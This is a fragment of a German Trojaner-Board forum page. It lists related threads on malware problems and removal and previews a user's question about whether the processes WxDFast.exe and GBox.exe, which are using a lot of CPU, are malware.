    Alles rund um Mac OSX & Linux - 23.02.2014 (3)
  3. Maleware Verschlüsselung?
    Plagegeister aller Art und deren Bekämpfung - 09.02.2014 (1)
  4. Maleware test
    Plagegeister aller Art und deren Bekämpfung - 22.01.2014 (18)
  5. Problem mit Maleware
    Alles rund um Windows - 24.05.2013 (5)
  6. Spyhunter 4, Maleware oder Maleware Security Suite?
    Plagegeister aller Art und deren Bekämpfung - 07.05.2013 (5)
  7. Skype Maleware
    Plagegeister aller Art und deren Bekämpfung - 13.03.2013 (1)
  8. Maleware entfernen
    Plagegeister aller Art und deren Bekämpfung - 04.12.2012 (21)
  9. Trojaner Maleware
    Plagegeister aller Art und deren Bekämpfung - 03.12.2012 (3)
  10. Maleware gefunden!
    Log-Analyse und Auswertung - 06.10.2012 (2)
  11. Maleware gefunden was tun?
    Log-Analyse und Auswertung - 24.04.2012 (23)
  12. mahilfe - maleware?
    Log-Analyse und Auswertung - 22.02.2012 (11)
  13. Maleware auf der Homepage???
    Plagegeister aller Art und deren Bekämpfung - 18.01.2012 (1)
  14. Maleware zu Antivier?
    Plagegeister aller Art und deren Bekämpfung - 03.07.2011 (1)
  15. Maleware Defense
    Plagegeister aller Art und deren Bekämpfung - 18.01.2010 (12)
  16. Google Maleware
    Log-Analyse und Auswertung - 29.11.2008 (1)
  17. Maleware!!
    Log-Analyse und Auswertung - 01.04.2006 (2)

Zum Thema WxDFast.exe und GBox.exe = Maleware? - Hallo erstmal Ich habe das Problem das eben meine CPU ziemlich hoch war. Dann wollte ich wissen welcher Prozess so hoch war und habe mal im Taskmanager nachgeschaut. Als der - WxDFast.exe und GBox.exe = Maleware?...
Archiv
Du betrachtest: WxDFast.exe und GBox.exe = Maleware? auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.